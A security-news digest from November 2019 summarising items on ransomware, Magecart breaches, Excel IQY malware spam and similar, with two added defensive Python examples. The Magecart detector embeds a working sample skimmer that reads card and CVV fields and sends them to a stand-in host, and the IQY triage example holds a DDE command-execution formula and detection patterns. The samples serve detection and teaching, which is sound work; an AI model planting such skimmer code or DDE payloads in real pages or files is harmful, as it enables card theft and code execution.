Daily NCSC-FI news followup 2019-11-19

Why Were the Russians So Set Against This Hacker Being Extradited?

krebsonsecurity.com/2019/11/why-were-the-russians-so-set-against-this-hacker-being-extradited/ The Russian government has for the past four years been fighting to keep 29-year-old alleged cybercriminal Alexei Burkov from being extradited by Israel to the United States. When Israeli authorities turned down requests to send him back to Russia, supposedly to face separate hacking charges there, the Russians imprisoned an Israeli woman for seven years on trumped-up drug charges in a bid to trade prisoners. That effort failed as well, and Burkov had his first appearance in a U.S. court last week. What follows are some clues that might explain why the Russians are so eager to reclaim this young man.

Collective Intelligence Podcast, Underground Markets

www.flashpoint-intel.com/blog/podcasts/collective-intelligence-podcast-underground-markets/ Underground markets continue to thrive across the internet. This is in spite of successful law enforcement action against a number of entities peddling anything from malware to drugs, as well as other markets' self-imposed shutdowns due to economic pressures within the underground. In this episode of the Collective Intelligence Podcast, Max and Ian discuss what they characterize as a tumultuous environment, and how buyers, sellers, and researchers react when these markets change.

The U.N. passed a resolution that gives Russia greater influence over internet norms

www.cyberscoop.com/un-resolution-internet-cybercrime-global-norms/ A cybercrime-focused resolution backed by Russia was passed Monday in the United Nations in New York, despite calls from the U.S. that the measure would further hamper efforts to root out crime on the internet. The resolution, which passed 88-58 with 34 abstentions, aims to establish a group to examine cybercrime and set up a convention to prevent it. However, human rights groups have argued that the resolution is actually an effort by the Kremlin to expand its model of state-backed internet control.

Louisiana Government Suffers Outage Due to Ransomware Attack

www.bleepingcomputer.com/news/security/louisiana-government-suffers-outage-due-to-ransomware-attack/ The state government of Louisiana was hit by a ransomware attack today that impacted numerous state services, including the Office of Motor Vehicles, the Department of Health, and the Department of Transportation and Development.

Down the Malware Rabbit Hole: Part II

blog.sucuri.net/2019/11/malware-rabbit-hole-part-2.html In our last post in this series, we took a look at a code snippet that had been encoded in a very specific way and hidden 91 layers deep. Today, we'll reveal how attackers achieve this level of encoding and investigate one of the many possible tools they can use to conceal malware on compromised websites.

Games entrepreneur Peter Vesterbacka curses the slowness of permit authorities: a million-euro windfall from foreign students is at risk

yle.fi/uutiset/3-11073611 A handful of foreign students, mostly from India, have been able to start a cybersecurity engineering programme in Salo, Southwest Finland. More would be coming, but arranging the permits has proved slower than expected. Peter Vesterbacka, part-owner of and adviser to the education export company Edunation, criticises the Finnish system in harsh terms. "It is outright shocking that you have to wait seven months to get to study in Finland. We have hundreds of students in the queue who have paid ten thousand euros to come and study in Finland. In the worst cases, schools have had to refund the money."

Macy’s Customer Payment Info Stolen in Magecart Data Breach

www.bleepingcomputer.com/news/security/macys-customer-payment-info-stolen-in-magecart-data-breach/ Macy's has announced that it suffered a data breach after its web site was hacked and malicious scripts that steal customers' payment information were planted on it. This type of compromise is called a Magecart attack: attackers compromise a web site so that they can inject malicious JavaScript into various sections of the site, and those scripts then steal payment information as a customer submits it. According to a 'Notice of Data Breach' issued by Macy's, the web site was hacked on October 7th, 2019 and a malicious script was added to the 'Checkout' and 'My Wallet' pages. Any payment information submitted on these pages while they were compromised, including credit card details and customer information, was sent to a remote site under the attacker's control.
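A skimmer of this kind shows up as a script the payment page did not have before: a new external script host or a new inline block that reads card fields and beacons them off-page. The check below is an added example, not code from the article or from Macy's: it records a baseline of a checkout page's scripts (external URLs plus SHA-256 of inline blocks) and reports anything not in that baseline, flagging third-party hosts and inline code that combines card-field names with a network sink. The page HTML, the first-party host shop.example and the skimmer host cdn.skimmer-host.test are constructed.

```python
"""Script-inventory check for a payment page, the kind of control that would
surface a Magecart injection into 'Checkout' or 'My Wallet'. Added example,
not from the article or Macy's; the page HTML and the hosts are constructed."""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "shop.example"          # assumed first-party origin

# Card-field names a skimmer reads, and the ways it ships them off the page.
FIELD_HINTS = re.compile(r"card|cvv|cvc|expir|ccnum", re.I)
SINK_HINTS = re.compile(r"XMLHttpRequest|fetch\(|sendBeacon|new Image\(|\.src\s*=", re.I)


class ScriptCollector(HTMLParser):
    """Collect every <script> as ('src', url) or ('inline', source)."""
    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.scripts.append(("src", src))
        else:
            self._in_inline, self._buf = True, []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self._in_inline = False
            self.scripts.append(("inline", "".join(self._buf).strip()))


def collect(html):
    p = ScriptCollector()
    p.feed(html)
    p.close()
    return p.scripts


def build_baseline(html):
    """Record the known-good page: external script URLs and hashes of inline blocks."""
    scripts = collect(html)
    srcs = {v for k, v in scripts if k == "src"}
    hashes = {hashlib.sha256(v.encode()).hexdigest() for k, v in scripts if k == "inline"}
    return srcs, hashes


def audit_page(html, baseline_srcs, baseline_hashes):
    """Return (kind, detail, high_risk) for every script that is not in the baseline."""
    findings = []
    for kind, val in collect(html):
        if kind == "src":
            if val not in baseline_srcs:
                host = urlparse(val).netloc or SITE_HOST   # relative src => first party
                findings.append(("unexpected-script", val, host != SITE_HOST))
        else:
            digest = hashlib.sha256(val.encode()).hexdigest()
            if digest not in baseline_hashes:
                skimmer = bool(FIELD_HINTS.search(val) and SINK_HINTS.search(val))
                findings.append(("unknown-inline", digest[:12], skimmer))
    return findings


# Constructed pages. The injected block is illustrative only: it reads the card
# fields on submit and beacons them to a third-party host via an image request.
PAGE_HEAD = '<html><body><form id="checkout"><input name="cardnumber"><input name="cvv"></form>\n'
FIRST_PARTY = '<script src="/static/checkout.js"></script>\n<script>window.csrfToken = "t0k3n";</script>\n'
INJECTED = ('<script src="https://cdn.skimmer-host.test/jquery.min.js"></script>\n'
            '<script>document.getElementById("checkout").addEventListener("submit", function () {\n'
            '  var d = {};\n'
            '  document.querySelectorAll("input").forEach(function (i) { if (/card|cvv/.test(i.name)) d[i.name] = i.value; });\n'
            '  new Image().src = "https://cdn.skimmer-host.test/c?d=" + btoa(JSON.stringify(d));\n'
            '});</script>\n')
CLEAN_PAGE = PAGE_HEAD + FIRST_PARTY + "</body></html>"
INJECTED_PAGE = PAGE_HEAD + FIRST_PARTY + INJECTED + "</body></html>"

if __name__ == "__main__":
    base = build_baseline(CLEAN_PAGE)
    for finding in audit_page(INJECTED_PAGE, *base):
        print(finding)
```

Run from a scheduled job that fetches the live checkout page, this catches the injection at the next poll rather than weeks later; a Content-Security-Policy that pins script-src and connect-src to first-party hosts would have stopped this particular beacon outright, but an inventory check still catches an injection that reuses an already-allowed host.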

Australia releases draft IoT cybersecurity code of practice

www.zdnet.com/article/australia-releases-draft-iot-cybersecurity-code-of-practice/#ftag=RSSbaffb68 The Australian government has released a draft code of practice for securing the Internet of Things (IoT), with a public consultation running until 1 March 2020. The voluntary Code of Practice: Securing the Internet of Things for Consumers, published on Tuesday, is intended to provide industry with best-practice advice.

Buran Ransomware Infects PCs via Microsoft Excel Web Queries

www.bleepingcomputer.com/news/security/buran-ransomware-infects-pcs-via-microsoft-excel-web-queries/ A new spam campaign has been spotted distributing the Buran Ransomware through IQY file attachments. When opened, these Microsoft Excel Web Query attachments will execute a remote command that installs the ransomware onto a victim’s computer.
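An .iqy file is plain text, which makes it easy to triage at the mail gateway before Excel ever sees it: line 1 is WEB, line 2 is the version 1, line 3 is the URL Excel fetches when the query refreshes, and any further lines are Key=Value options. The example below is added here and is not from the article: it parses the attachment, blocks anything that is not a well-formed WEB query or that points outside an assumed allow-list of internal data sources, and separately recognises a fetched body that is a DDE-style formula rather than data (the mechanism by which the query "executes a remote command"). The two sample files, the host allow-list and the server response are constructed.

```python
"""Mail-gateway triage for Excel Web Query (.iqy) attachments. Added example,
not from the article. An .iqy file is plain text: line 1 'WEB', line 2 '1',
line 3 the URL Excel fetches on refresh, then optional Key=Value options.
The samples below are constructed and the host allow-list is an assumption."""
import ipaddress
import re
from urllib.parse import urlparse

ALLOWED_HOSTS = {"reports.corp.example"}   # assumed: internal sources users legitimately query

# A fetched payload that is a DDE formula rather than data looks like
# =cmd|' /c calc.exe'!A0 : formula prefix, a pipe, then !cell.
DDE_FORMULA = re.compile(r"^\s*[=+\-@][^|\n]*\|.*!", re.S)


def parse_iqy(text):
    """Return (url, options) or raise ValueError if this is not a WEB query."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB" or lines[1] != "1":
        raise ValueError("not a WEB query file")
    options = dict(ln.partition("=")[::2] for ln in lines[3:])
    return lines[2], {k.strip(): v.strip() for k, v in options.items()}


def triage_iqy(text):
    """Return ('allow' | 'block', reasons) for one attachment body."""
    try:
        url, _options = parse_iqy(text)
    except ValueError as err:
        return "block", [str(err)]
    parts = urlparse(url)
    host = parts.hostname or ""
    reasons = []
    if parts.scheme not in ("http", "https"):
        reasons.append(f"unexpected scheme {parts.scheme!r}")
    if host not in ALLOWED_HOSTS:
        reasons.append(f"host {host!r} is not allow-listed")
    try:
        ipaddress.ip_address(host)
        reasons.append("URL uses a raw IP address")
    except ValueError:
        pass
    return ("block" if reasons else "allow"), reasons


def looks_like_dde(payload):
    """True if the text Excel would receive is a DDE-style formula, not data."""
    return bool(DDE_FORMULA.search(payload))


BENIGN_IQY = "WEB\n1\nhttps://reports.corp.example/sales.aspx\n\nSelection=EntirePage\nFormatting=None\n"
SUSPECT_IQY = "WEB\n1\nhttp://203.0.113.45/update.iqy\n"     # constructed; TEST-NET-3 address
SUSPECT_BODY = "=cmd|' /c calc.exe'!A0\n"                       # constructed, harmless DDE stand-in

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_IQY), ("suspect", SUSPECT_IQY)):
        print(name, triage_iqy(sample))
    print("fetched body is DDE:", looks_like_dde(SUSPECT_BODY))
```

Most organisations have no legitimate inbound .iqy traffic at all, in which case blocking the extension outright (together with .oqy, .dqy and .rqy, the other Office query formats) is simpler than allow-listing; Excel does prompt before enabling the data connection and again before DDE, but the campaign relies on users clicking through both.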

Databases for actual control system cyber incidents exist and they are important for many reasons

www.controlglobal.com/blogs/unfettered/databases-for-actual-control-system-cyber-incidents-exist-and-they-are-important-for-many-reasons/

The unpredictability of the digital discussion environment is also visible in police work

www.poliisi.fi/tietoa_poliisista/tiedotteet/1/1/digitaalisen_keskusteluympariston_arvaamattomuus_nakyy_myos_poliisin_tyossa_85863 The development and spread of smart devices have made it easier for people to organise around issues, but at the same time the range of side effects that disrupt public debate has grown. Examples of such phenomena are targeted harassment of individuals, deliberate disruption of discussions, harsh language, trolling and disinformation.

Shade Ransomware Is the Most Actively Distributed Malware via Email

www.bleepingcomputer.com/news/security/shade-ransomware-is-the-most-actively-distributed-malware-via-email/ During the first half of 2019, the Shade Ransomware (also known as Troldesh) was the most actively distributed malware via malicious email phishing campaigns, according to the Singapore-based security outfit Group-IB.

Hacking and cyber espionage: The countries that are going to emerge as major threats in the 2020s

www.zdnet.com/article/hacking-and-cyber-espionage-the-countries-that-are-going-to-emerge-as-major-threats-in-the-2020s/#ftag=RSSbaffb68 Nation-state backed cyber groups have been responsible for major incidents over the last decade. And now more countries want the same power.

Until recently, weaknesses in Android camera apps from Google and Samsung made it possible for rogue apps to record video and audio and take images and then upload them to an attacker-controlled server, without any permissions to do so. Camera apps from other manufacturers may still be susceptible.

arstechnica.com/information-technology/2019/11/google-samsung-fix-android-spying-flaw-other-makers-may-still-be-vulnerable/ also: www.checkmarx.com/blog/how-attackers-could-hijack-your-android-camera also: threatpost.com/google-android-camera-hijack-hack/150409/

Fake Windows Update Spam Leads to Cyborg Ransomware and Its Builder

www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/fake-windows-update-spam-leads-to-cyborg-ransomware-and-its-builder/ Recently, fake Microsoft Windows Update emails were spammed with the following subject lines: "Install Latest Microsoft Windows Update now!", "Critical Microsoft Windows Update!". The email, claiming to be from Microsoft, contains just one sentence in its body, which starts with two capital letters. It directs the recipient's attention to the attachment as the latest critical update.

Cheap Chinese JAWS of DVR Exploitability on Port 60001

isc.sans.edu/forums/diary/Cheap+Chinese+JAWS+of+DVR+Exploitability+on+Port+60001/25530/ Looking at some local IP addresses in our database during class this week, I came across a host scanning exclusively for port 60001. Interestingly, we did see a marked increase in scans for this port in recent weeks.

Ransomware Bites 400 Veterinary Hospitals

krebsonsecurity.com/2019/11/ransomware-bites-400-veterinary-hospitals/ National Veterinary Associates (NVA), a California company that owns more than 700 animal care facilities around the globe, is still working to recover from a ransomware attack late last month that affected more than half of those properties, separating many veterinary practices from their patient records, payment systems and practice management software. NVA says it expects to have all facilities

Cybercriminals are Targeting your Entire Digital Footprint

www.fortinet.com/blog/industry-trends/cybercriminals-target-entire-digital-footprint.html The third quarter of 2019 saw a number of new cyberthreat trends emerge or expand, and organizations need to be aware of these trends if they wish to stay ahead of cybercriminal strategies. One of the most effective attack strategies does not require cybercriminals to build new malware, but simply to change their tactics.

Mispadu: Advertisement for a discounted Unhappy Meal

www.welivesecurity.com/2019/11/19/mispadu-advertisement-discounted-unhappy-meal/ In this installment of our blog series, we will focus on Mispadu, an ambitious Latin American banking trojan that utilizes McDonald's malvertising and extends its attack surface to web browsers. We believe this malware family is targeting the general public. Its main goals are monetary and credential theft. In Brazil, we have seen it distributing a malicious Google Chrome extension that attempts to steal credit card data and online banking data, and that compromises the Boleto payment system.

Official Monero website compromised with malware that steals funds

www.zdnet.com/article/official-monero-website-compromised-with-malware-that-steals-funds/#ftag=RSSbaffb68 Official Linux CLI binary for the Monero cryptocurrency compromised with malware that steals users’ funds.

Data Theft at Cayman National in the Isle of Man

www.caymannational.im/news/banking/data-theft-at-cayman-national-in-the-isle-of-man Cayman National Bank (Isle of Man) Limited, together with its sister company Cayman National Trust Company (Isle of Man) Limited, confirms that it has experienced a data hack. Responsibility for the data theft was claimed by a criminal hacking group on Sunday 17 November 2019. also: https://twitter.com/DDoSecrets/status/1195899716653010945
